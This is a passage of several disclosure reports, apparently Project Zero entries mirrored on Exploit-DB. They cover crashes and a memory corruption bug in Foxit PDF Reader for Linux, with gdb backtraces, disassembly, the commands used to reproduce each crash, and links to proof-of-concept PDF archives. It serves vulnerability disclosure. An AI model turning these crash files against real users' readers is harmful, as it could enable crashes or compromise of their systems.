#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
--- cut ---
Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39940.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745
We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
(gdb) where
#0 0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
#1 0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#2 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#3 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#4 0x00000000006c6364 in CRichTextXML::ParseXML2Text() ()
#5 0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) ()
#6 0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) ()
#7 0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) ()
#8 0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) ()
#9 0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) ()
#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) ()
#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) ()
#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) ()
#13 0x00000000005d2475 in CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) ()
#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901
#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670)
at ../../Readerlite/ReaderLite/src/preview.cpp:3204
#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180)
at ../../Readerlite/ReaderLite/src/preview.cpp:1443
#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520)
at ../../Readerlite/ReaderLite/src/preview.cpp:2386
#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() ()
#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>: cmpq $0x0,0x0(%r13)
0xab4684 <_ZN14CFX_WideStringaSERKS_+56>: js 0xab4692 <_ZN14CFX_WideStringaSERKS_+70>
0xab4686 <_ZN14CFX_WideStringaSERKS_+58>: test %rbp,%rbp
0xab4689 <_ZN14CFX_WideStringaSERKS_+61>: je 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
0xab468b <_ZN14CFX_WideStringaSERKS_+63>: cmpq $0x0,0x0(%rbp)
0xab4690 <_ZN14CFX_WideStringaSERKS_+68>: jns 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
0xab4692 <_ZN14CFX_WideStringaSERKS_+70>: mov 0x8(%rbp),%esi
0xab4695 <_ZN14CFX_WideStringaSERKS_+73>: lea 0x10(%rbp),%rdx
0xab4699 <_ZN14CFX_WideStringaSERKS_+77>: mov %rbx,%rdi
0xab469c <_ZN14CFX_WideStringaSERKS_+80>: callq 0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw>
(gdb) info reg $r13
r13 0x740000006e 498216206446
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39942.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744
We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set because we are testing the application with a virtual X server (Xvfb); the issue should be equally reproducible when the program is started with standard display settings.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const ()
(gdb) where
#0 0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const
()
#1 0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const ()
#2 0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const ()
#3 0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() ()
#4 0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#5 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#6 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#9 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#50 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#53 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>: mov 0x2(%rbp),%dl
0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>: add $0x3,%r13
0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>: add $0x3,%rbp
0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>: inc %eax
0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>: mov %dl,-0x3(%r13)
0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>: mov -0x2(%rbp),%dl
0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>: mov %dl,-0x2(%r13)
0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>: mov -0x3(%rbp),%dl
0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>: mov %dl,-0x1(%r13)
0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>:
jmp 0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179>
(gdb) info reg $rbp
rbp 0x1a30fff 0x1a30fff
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39941.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set because we are testing the application with a virtual X server (Xvfb); the issue should be equally reproducible when the program is started with standard display settings.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
(gdb) info reg $rdx
rdx 0x90ff9fc23e15101d -7998498756572671971
(gdb) where
#0 0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
#1 0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) ()
#2 0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) ()
#3 0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() ()
#4 0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() ()
#5 0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) ()
#6 0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#9 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
